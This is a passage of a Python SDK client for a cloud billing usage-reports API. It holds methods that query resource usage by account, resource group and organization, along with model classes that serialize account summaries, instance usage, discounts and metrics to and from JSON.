url = '/v4/accounts/{account_id}/resource_instances/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
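    # Pagination sketch (an assumption based on the `start` parameter and the
    # `next.offset` field of the paged response, not verbatim from the source):
    #   start = None
    #   while True:
    #       page = service.get_resource_usage_account(
    #           account_id='<account-id>', billingmonth='2021-01',
    #           limit=20, start=start,
    #       ).get_result()
    #       for instance in page.get('resources', []):
    #           ...  # process one instance usage record
    #       start = (page.get('next') or {}).get('offset')
    #       if start is None:
    #           break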
def get_resource_usage_resource_group(self,
account_id: str,
resource_group_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
limit: int = None,
start: str = None,
resource_instance_id: str = None,
resource_id: str = None,
plan_id: str = None,
region: str = None,
**kwargs
) -> DetailedResponse:
"""
Get resource instance usage in a resource group.
Query for resource instance usage in a resource group. Filter the results with
        query parameters. The account billing administrator and resource group
        billing administrators are authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str resource_group_id: Resource group for which the usage report is
requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param int limit: (optional) Number of usage records returned. The default
value is 10. Maximum value is 20.
:param str start: (optional) The offset from which the records must be
fetched. Offset information is included in the response.
        :param str resource_instance_id: (optional) Filter by resource_instance_id.
:param str resource_id: (optional) Filter by resource_id.
:param str plan_id: (optional) Filter by plan_id.
:param str region: (optional) Region in which the resource instance is
provisioned.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `InstancesUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if resource_group_id is None:
raise ValueError('resource_group_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_resource_usage_resource_group')
headers.update(sdk_headers)
params = {
'_names': names,
'_limit': limit,
'_start': start,
'resource_instance_id': resource_instance_id,
'resource_id': resource_id,
'plan_id': plan_id,
'region': region
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'resource_group_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, resource_group_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/resource_groups/{resource_group_id}/resource_instances/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
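    # Filter sketch (placeholder IDs): the optional filters can be combined, e.g.
    # to narrow a resource group report to a single plan in one region:
    #   usage = service.get_resource_usage_resource_group(
    #       account_id='<account-id>', resource_group_id='<group-id>',
    #       billingmonth='2021-01', plan_id='<plan-id>', region='us-south',
    #   ).get_result()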
def get_resource_usage_org(self,
account_id: str,
organization_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
limit: int = None,
start: str = None,
resource_instance_id: str = None,
resource_id: str = None,
plan_id: str = None,
region: str = None,
**kwargs
) -> DetailedResponse:
"""
Get resource instance usage in an organization.
Query for resource instance usage in an organization. Filter the results with
        query parameters. The account billing administrator and organization
        billing administrators are authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str organization_id: ID of the organization.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param int limit: (optional) Number of usage records returned. The default
value is 10. Maximum value is 20.
:param str start: (optional) The offset from which the records must be
fetched. Offset information is included in the response.
        :param str resource_instance_id: (optional) Filter by resource_instance_id.
:param str resource_id: (optional) Filter by resource_id.
:param str plan_id: (optional) Filter by plan_id.
:param str region: (optional) Region in which the resource instance is
provisioned.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `InstancesUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if organization_id is None:
raise ValueError('organization_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_resource_usage_org')
headers.update(sdk_headers)
params = {
'_names': names,
'_limit': limit,
'_start': start,
'resource_instance_id': resource_instance_id,
'resource_id': resource_id,
'plan_id': plan_id,
'region': region
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'organization_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, organization_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/organizations/{organization_id}/resource_instances/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
#########################
# Organization operations
#########################
def get_org_usage(self,
account_id: str,
organization_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
**kwargs
) -> DetailedResponse:
"""
Get organization usage.
Usage for all the resources and plans in an organization in a given month. Account
billing managers or organization billing managers are authorized to access this
report.
:param str account_id: Account ID for which the usage report is requested.
:param str organization_id: ID of the organization.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `OrgUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if organization_id is None:
raise ValueError('organization_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_org_usage')
headers.update(sdk_headers)
params = {
'_names': names
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'organization_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, organization_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/organizations/{organization_id}/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
##############################################################################
# Models
##############################################################################
class AccountSummary():
"""
A summary of charges and credits for an account.
:attr str account_id: The ID of the account.
:attr str billing_month: The month in which usages were incurred. Represented in
yyyy-mm format.
:attr str billing_country_code: Country.
:attr str billing_currency_code: The currency in which the account is billed.
:attr ResourcesSummary resources: Charges related to cloud resources.
:attr List[Offer] offers: The list of offers applicable for the account for the
month.
:attr List[SupportSummary] support: Support-related charges.
:attr SubscriptionSummary subscription: A summary of charges and credits related
to a subscription.
"""
def __init__(self,
account_id: str,
billing_month: str,
billing_country_code: str,
billing_currency_code: str,
resources: 'ResourcesSummary',
offers: List['Offer'],
support: List['SupportSummary'],
subscription: 'SubscriptionSummary') -> None:
"""
        Initialize an AccountSummary object.
:param str account_id: The ID of the account.
:param str billing_month: The month in which usages were incurred.
Represented in yyyy-mm format.
:param str billing_country_code: Country.
:param str billing_currency_code: The currency in which the account is
billed.
:param ResourcesSummary resources: Charges related to cloud resources.
:param List[Offer] offers: The list of offers applicable for the account
for the month.
:param List[SupportSummary] support: Support-related charges.
:param SubscriptionSummary subscription: A summary of charges and credits
related to a subscription.
"""
self.account_id = account_id
self.billing_month = billing_month
self.billing_country_code = billing_country_code
self.billing_currency_code = billing_currency_code
self.resources = resources
self.offers = offers
self.support = support
self.subscription = subscription
@classmethod
def from_dict(cls, _dict: Dict) -> 'AccountSummary':
"""Initialize a AccountSummary object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in AccountSummary JSON')
if 'billing_month' in _dict:
args['billing_month'] = _dict.get('billing_month')
else:
raise ValueError('Required property \'billing_month\' not present in AccountSummary JSON')
if 'billing_country_code' in _dict:
args['billing_country_code'] = _dict.get('billing_country_code')
else:
raise ValueError('Required property \'billing_country_code\' not present in AccountSummary JSON')
if 'billing_currency_code' in _dict:
args['billing_currency_code'] = _dict.get('billing_currency_code')
else:
raise ValueError('Required property \'billing_currency_code\' not present in AccountSummary JSON')
if 'resources' in _dict:
args['resources'] = ResourcesSummary.from_dict(_dict.get('resources'))
else:
raise ValueError('Required property \'resources\' not present in AccountSummary JSON')
if 'offers' in _dict:
args['offers'] = [Offer.from_dict(x) for x in _dict.get('offers')]
else:
raise ValueError('Required property \'offers\' not present in AccountSummary JSON')
if 'support' in _dict:
args['support'] = [SupportSummary.from_dict(x) for x in _dict.get('support')]
else:
raise ValueError('Required property \'support\' not present in AccountSummary JSON')
if 'subscription' in _dict:
args['subscription'] = SubscriptionSummary.from_dict(_dict.get('subscription'))
else:
raise ValueError('Required property \'subscription\' not present in AccountSummary JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a AccountSummary object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'billing_month') and self.billing_month is not None:
_dict['billing_month'] = self.billing_month
if hasattr(self, 'billing_country_code') and self.billing_country_code is not None:
_dict['billing_country_code'] = self.billing_country_code
if hasattr(self, 'billing_currency_code') and self.billing_currency_code is not None:
_dict['billing_currency_code'] = self.billing_currency_code
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = self.resources.to_dict()
if hasattr(self, 'offers') and self.offers is not None:
_dict['offers'] = [x.to_dict() for x in self.offers]
if hasattr(self, 'support') and self.support is not None:
_dict['support'] = [x.to_dict() for x in self.support]
if hasattr(self, 'subscription') and self.subscription is not None:
_dict['subscription'] = self.subscription.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this AccountSummary object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'AccountSummary') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'AccountSummary') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
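# Round-trip sketch (an assumption based on the methods above): model classes
# convert between typed objects and the plain dictionaries that `get_result()`
# returns, e.g.
#   summary = AccountSummary.from_dict(account_summary_dict)
#   assert summary.to_dict() == account_summary_dict  # when the dict holds exactly
#                                                     # the documented properties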
class AccountUsage():
"""
The aggregated usage and charges for all the plans in the account.
:attr str account_id: The ID of the account.
:attr str pricing_country: The target country pricing that should be used.
:attr str currency_code: The currency for the cost fields in the resources,
plans and metrics.
:attr str month: The month.
    :attr List[Resource] resources: All the resources used in the account.
"""
def __init__(self,
account_id: str,
pricing_country: str,
currency_code: str,
month: str,
resources: List['Resource']) -> None:
"""
        Initialize an AccountUsage object.
:param str account_id: The ID of the account.
:param str pricing_country: The target country pricing that should be used.
:param str currency_code: The currency for the cost fields in the
resources, plans and metrics.
:param str month: The month.
        :param List[Resource] resources: All the resources used in the account.
"""
self.account_id = account_id
self.pricing_country = pricing_country
self.currency_code = currency_code
self.month = month
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'AccountUsage':
"""Initialize a AccountUsage object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in AccountUsage JSON')
if 'pricing_country' in _dict:
args['pricing_country'] = _dict.get('pricing_country')
else:
raise ValueError('Required property \'pricing_country\' not present in AccountUsage JSON')
if 'currency_code' in _dict:
args['currency_code'] = _dict.get('currency_code')
else:
raise ValueError('Required property \'currency_code\' not present in AccountUsage JSON')
if 'month' in _dict:
args['month'] = _dict.get('month')
else:
raise ValueError('Required property \'month\' not present in AccountUsage JSON')
if 'resources' in _dict:
args['resources'] = [Resource.from_dict(x) for x in _dict.get('resources')]
else:
raise ValueError('Required property \'resources\' not present in AccountUsage JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a AccountUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'pricing_country') and self.pricing_country is not None:
_dict['pricing_country'] = self.pricing_country
if hasattr(self, 'currency_code') and self.currency_code is not None:
_dict['currency_code'] = self.currency_code
if hasattr(self, 'month') and self.month is not None:
_dict['month'] = self.month
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = [x.to_dict() for x in self.resources]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this AccountUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'AccountUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'AccountUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Discount():
"""
Information about a discount that is associated with a metric.
:attr str ref: The reference ID of the discount.
    :attr str name: (optional) The name of the discount, indicating its category.
:attr str display_name: (optional) The name of the discount.
:attr float discount: The discount percentage.
"""
def __init__(self,
ref: str,
discount: float,
*,
name: str = None,
display_name: str = None) -> None:
"""
Initialize a Discount object.
:param str ref: The reference ID of the discount.
:param float discount: The discount percentage.
        :param str name: (optional) The name of the discount, indicating its category.
:param str display_name: (optional) The name of the discount.
"""
self.ref = ref
self.name = name
self.display_name = display_name
self.discount = discount
@classmethod
def from_dict(cls, _dict: Dict) -> 'Discount':
"""Initialize a Discount object from a json dictionary."""
args = {}
if 'ref' in _dict:
args['ref'] = _dict.get('ref')
else:
raise ValueError('Required property \'ref\' not present in Discount JSON')
if 'name' in _dict:
args['name'] = _dict.get('name')
if 'display_name' in _dict:
args['display_name'] = _dict.get('display_name')
if 'discount' in _dict:
args['discount'] = _dict.get('discount')
else:
raise ValueError('Required property \'discount\' not present in Discount JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Discount object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'ref') and self.ref is not None:
_dict['ref'] = self.ref
if hasattr(self, 'name') and self.name is not None:
_dict['name'] = self.name
if hasattr(self, 'display_name') and self.display_name is not None:
_dict['display_name'] = self.display_name
if hasattr(self, 'discount') and self.discount is not None:
_dict['discount'] = self.discount
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Discount object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Discount') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Discount') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class InstanceUsage():
"""
The aggregated usage and charges for an instance.
:attr str account_id: The ID of the account.
:attr str resource_instance_id: The ID of the resource instance.
:attr str resource_instance_name: (optional) The name of the resource instance.
:attr str resource_id: The ID of the resource.
:attr str resource_name: (optional) The name of the resource.
:attr str resource_group_id: (optional) The ID of the resource group.
:attr str resource_group_name: (optional) The name of the resource group.
:attr str organization_id: (optional) The ID of the organization.
:attr str organization_name: (optional) The name of the organization.
:attr str space_id: (optional) The ID of the space.
:attr str space_name: (optional) The name of the space.
:attr str consumer_id: (optional) The ID of the consumer.
    :attr str region: (optional) The region where the instance was provisioned.
    :attr str pricing_region: (optional) The pricing region in which the
    submitted usage was rated.
:attr str pricing_country: The target country pricing that should be used.
:attr str currency_code: The currency for the cost fields in the resources,
plans and metrics.
    :attr bool billable: Whether the cost is charged to the account.
:attr str plan_id: The ID of the plan where the instance was provisioned and
rated.
:attr str plan_name: (optional) The name of the plan where the instance was
provisioned and rated.
:attr str month: The month.
    :attr List[Metric] usage: All the usage metrics for the instance.
"""
def __init__(self,
account_id: str,
resource_instance_id: str,
resource_id: str,
pricing_country: str,
currency_code: str,
billable: bool,
plan_id: str,
month: str,
usage: List['Metric'],
*,
resource_instance_name: str = None,
resource_name: str = None,
resource_group_id: str = None,
resource_group_name: str = None,
organization_id: str = None,
organization_name: str = None,
space_id: str = None,
space_name: str = None,
consumer_id: str = None,
region: str = None,
pricing_region: str = None,
plan_name: str = None) -> None:
"""
        Initialize an InstanceUsage object.
:param str account_id: The ID of the account.
:param str resource_instance_id: The ID of the resource instance.
:param str resource_id: The ID of the resource.
:param str pricing_country: The target country pricing that should be used.
:param str currency_code: The currency for the cost fields in the
resources, plans and metrics.
        :param bool billable: Whether the cost is charged to the account.
:param str plan_id: The ID of the plan where the instance was provisioned
and rated.
:param str month: The month.
        :param List[Metric] usage: All the usage metrics for the instance.
:param str resource_instance_name: (optional) The name of the resource
instance.
:param str resource_name: (optional) The name of the resource.
:param str resource_group_id: (optional) The ID of the resource group.
:param str resource_group_name: (optional) The name of the resource group.
:param str organization_id: (optional) The ID of the organization.
:param str organization_name: (optional) The name of the organization.
:param str space_id: (optional) The ID of the space.
:param str space_name: (optional) The name of the space.
:param str consumer_id: (optional) The ID of the consumer.
        :param str region: (optional) The region where the instance was provisioned.
        :param str pricing_region: (optional) The pricing region in which the
        submitted usage was rated.
:param str plan_name: (optional) The name of the plan where the instance
was provisioned and rated.
"""
self.account_id = account_id
self.resource_instance_id = resource_instance_id
self.resource_instance_name = resource_instance_name
self.resource_id = resource_id
self.resource_name = resource_name
self.resource_group_id = resource_group_id
self.resource_group_name = resource_group_name
self.organization_id = organization_id
self.organization_name = organization_name
self.space_id = space_id
self.space_name = space_name
self.consumer_id = consumer_id
self.region = region
self.pricing_region = pricing_region
self.pricing_country = pricing_country
self.currency_code = currency_code
self.billable = billable
self.plan_id = plan_id
self.plan_name = plan_name
self.month = month
self.usage = usage
@classmethod
def from_dict(cls, _dict: Dict) -> 'InstanceUsage':
"""Initialize a InstanceUsage object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in InstanceUsage JSON')
if 'resource_instance_id' in _dict:
args['resource_instance_id'] = _dict.get('resource_instance_id')
else:
raise ValueError('Required property \'resource_instance_id\' not present in InstanceUsage JSON')
if 'resource_instance_name' in _dict:
args['resource_instance_name'] = _dict.get('resource_instance_name')
if 'resource_id' in _dict:
args['resource_id'] = _dict.get('resource_id')
else:
raise ValueError('Required property \'resource_id\' not present in InstanceUsage JSON')
if 'resource_name' in _dict:
args['resource_name'] = _dict.get('resource_name')
if 'resource_group_id' in _dict:
args['resource_group_id'] = _dict.get('resource_group_id')
if 'resource_group_name' in _dict:
args['resource_group_name'] = _dict.get('resource_group_name')
if 'organization_id' in _dict:
args['organization_id'] = _dict.get('organization_id')
if 'organization_name' in _dict:
args['organization_name'] = _dict.get('organization_name')
if 'space_id' in _dict:
args['space_id'] = _dict.get('space_id')
if 'space_name' in _dict:
args['space_name'] = _dict.get('space_name')
if 'consumer_id' in _dict:
args['consumer_id'] = _dict.get('consumer_id')
if 'region' in _dict:
args['region'] = _dict.get('region')
if 'pricing_region' in _dict:
args['pricing_region'] = _dict.get('pricing_region')
if 'pricing_country' in _dict:
args['pricing_country'] = _dict.get('pricing_country')
else:
raise ValueError('Required property \'pricing_country\' not present in InstanceUsage JSON')
if 'currency_code' in _dict:
args['currency_code'] = _dict.get('currency_code')
else:
raise ValueError('Required property \'currency_code\' not present in InstanceUsage JSON')
if 'billable' in _dict:
args['billable'] = _dict.get('billable')
else:
raise ValueError('Required property \'billable\' not present in InstanceUsage JSON')
if 'plan_id' in _dict:
args['plan_id'] = _dict.get('plan_id')
else:
raise ValueError('Required property \'plan_id\' not present in InstanceUsage JSON')
if 'plan_name' in _dict:
args['plan_name'] = _dict.get('plan_name')
if 'month' in _dict:
args['month'] = _dict.get('month')
else:
raise ValueError('Required property \'month\' not present in InstanceUsage JSON')
if 'usage' in _dict:
args['usage'] = [Metric.from_dict(x) for x in _dict.get('usage')]
else:
raise ValueError('Required property \'usage\' not present in InstanceUsage JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a InstanceUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'resource_instance_id') and self.resource_instance_id is not None:
_dict['resource_instance_id'] = self.resource_instance_id
if hasattr(self, 'resource_instance_name') and self.resource_instance_name is not None:
_dict['resource_instance_name'] = self.resource_instance_name
if hasattr(self, 'resource_id') and self.resource_id is not None:
_dict['resource_id'] = self.resource_id
if hasattr(self, 'resource_name') and self.resource_name is not None:
_dict['resource_name'] = self.resource_name
if hasattr(self, 'resource_group_id') and self.resource_group_id is not None:
_dict['resource_group_id'] = self.resource_group_id
if hasattr(self, 'resource_group_name') and self.resource_group_name is not None:
_dict['resource_group_name'] = self.resource_group_name
if hasattr(self, 'organization_id') and self.organization_id is not None:
_dict['organization_id'] = self.organization_id
if hasattr(self, 'organization_name') and self.organization_name is not None:
_dict['organization_name'] = self.organization_name
if hasattr(self, 'space_id') and self.space_id is not None:
_dict['space_id'] = self.space_id
if hasattr(self, 'space_name') and self.space_name is not None:
_dict['space_name'] = self.space_name
if hasattr(self, 'consumer_id') and self.consumer_id is not None:
_dict['consumer_id'] = self.consumer_id
if hasattr(self, 'region') and self.region is not None:
_dict['region'] = self.region
if hasattr(self, 'pricing_region') and self.pricing_region is not None:
_dict['pricing_region'] = self.pricing_region
if hasattr(self, 'pricing_country') and self.pricing_country is not None:
_dict['pricing_country'] = self.pricing_country
if hasattr(self, 'currency_code') and self.currency_code is not None:
_dict['currency_code'] = self.currency_code
if hasattr(self, 'billable') and self.billable is not None:
_dict['billable'] = self.billable
if hasattr(self, 'plan_id') and self.plan_id is not None:
_dict['plan_id'] = self.plan_id
if hasattr(self, 'plan_name') and self.plan_name is not None:
_dict['plan_name'] = self.plan_name
if hasattr(self, 'month') and self.month is not None:
_dict['month'] = self.month
if hasattr(self, 'usage') and self.usage is not None:
_dict['usage'] = [x.to_dict() for x in self.usage]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this InstanceUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'InstanceUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'InstanceUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class InstancesUsageFirst():
"""
The link to the first page of the search query.
:attr str href: (optional) A link to a page of query results.
"""
def __init__(self,
*,
href: str = None) -> None:
"""
        Initialize an InstancesUsageFirst object.
:param str href: (optional) A link to a page of query results.
"""
self.href = href
@classmethod
def from_dict(cls, _dict: Dict) -> 'InstancesUsageFirst':
"""Initialize a InstancesUsageFirst object from a json dictionary."""
args = {}
if 'href' in _dict:
args['href'] = _dict.get('href')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a InstancesUsageFirst object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'href') and self.href is not None:
_dict['href'] = self.href
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this InstancesUsageFirst object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'InstancesUsageFirst') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'InstancesUsageFirst') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class InstancesUsageNext():
"""
The link to the next page of the search query.
:attr str href: (optional) A link to a page of query results.
:attr str offset: (optional) The value of the `_start` query parameter to fetch
the next page.
"""
def __init__(self,
*,
href: str = None,
offset: str = None) -> None:
"""
        Initialize an InstancesUsageNext object.
:param str href: (optional) A link to a page of query results.
:param str offset: (optional) The value of the `_start` query parameter to
fetch the next page.
"""
self.href = href
self.offset = offset
@classmethod
def from_dict(cls, _dict: Dict) -> 'InstancesUsageNext':
"""Initialize a InstancesUsageNext object from a json dictionary."""
args = {}
if 'href' in _dict:
args['href'] = _dict.get('href')
if 'offset' in _dict:
args['offset'] = _dict.get('offset')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a InstancesUsageNext object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'href') and self.href is not None:
_dict['href'] = self.href
if hasattr(self, 'offset') and self.offset is not None:
_dict['offset'] = self.offset
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this InstancesUsageNext object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'InstancesUsageNext') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'InstancesUsageNext') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class InstancesUsage():
"""
The list of instance usage reports.
:attr int limit: (optional) The max number of reports in the response.
:attr int count: (optional) The number of reports in the response.
:attr InstancesUsageFirst first: (optional) The link to the first page of the
search query.
:attr InstancesUsageNext next: (optional) The link to the next page of the
search query.
:attr List[InstanceUsage] resources: (optional) The list of instance usage
reports.
"""
def __init__(self,
*,
limit: int = None,
count: int = None,
first: 'InstancesUsageFirst' = None,
next: 'InstancesUsageNext' = None,
resources: List['InstanceUsage'] = None) -> None:
"""
        Initialize an InstancesUsage object.
:param int limit: (optional) The max number of reports in the response.
:param int count: (optional) The number of reports in the response.
:param InstancesUsageFirst first: (optional) The link to the first page of
the search query.
:param InstancesUsageNext next: (optional) The link to the next page of the
search query.
:param List[InstanceUsage] resources: (optional) The list of instance usage
reports.
"""
self.limit = limit
self.count = count
self.first = first
self.next = next
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'InstancesUsage':
"""Initialize a InstancesUsage object from a json dictionary."""
args = {}
if 'limit' in _dict:
args['limit'] = _dict.get('limit')
if 'count' in _dict:
args['count'] = _dict.get('count')
if 'first' in _dict:
args['first'] = InstancesUsageFirst.from_dict(_dict.get('first'))
if 'next' in _dict:
args['next'] = InstancesUsageNext.from_dict(_dict.get('next'))
if 'resources' in _dict:
args['resources'] = [InstanceUsage.from_dict(x) for x in _dict.get('resources')]
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a InstancesUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'limit') and self.limit is not None:
_dict['limit'] = self.limit
if hasattr(self, 'count') and self.count is not None:
_dict['count'] = self.count
if hasattr(self, 'first') and self.first is not None:
_dict['first'] = self.first.to_dict()
if hasattr(self, 'next') and self.next is not None:
_dict['next'] = self.next.to_dict()
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = [x.to_dict() for x in self.resources]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this InstancesUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'InstancesUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'InstancesUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
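# Traversal sketch (placeholder input): walking a deserialized page of instance
# usage down to the per-metric costs:
#   page = InstancesUsage.from_dict(instances_usage_dict)
#   for instance in page.resources or []:
#       for metric in instance.usage:
#           print(instance.resource_instance_id, metric.metric, metric.cost)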
class Metric():
"""
Information about a metric.
:attr str metric: The ID of the metric.
:attr str metric_name: (optional) The name of the metric.
:attr float quantity: The aggregated value for the metric.
:attr float rateable_quantity: (optional) The quantity that is used for
calculating charges.
:attr float cost: The cost incurred by the metric.
    :attr float rated_cost: The pre-discount cost incurred by the metric.
:attr List[object] price: (optional) The price with which the cost was
calculated.
:attr str unit: (optional) The unit that qualifies the quantity.
:attr str unit_name: (optional) The name of the unit.
    :attr bool non_chargeable: (optional) When set to `true`, the cost is for
    informational purposes and is not included when calculating the plan charges.
:attr List[Discount] discounts: All the discounts applicable to the metric.
"""
def __init__(self,
metric: str,
quantity: float,
cost: float,
rated_cost: float,
discounts: List['Discount'],
*,
metric_name: str = None,
rateable_quantity: float = None,
price: List[object] = None,
unit: str = None,
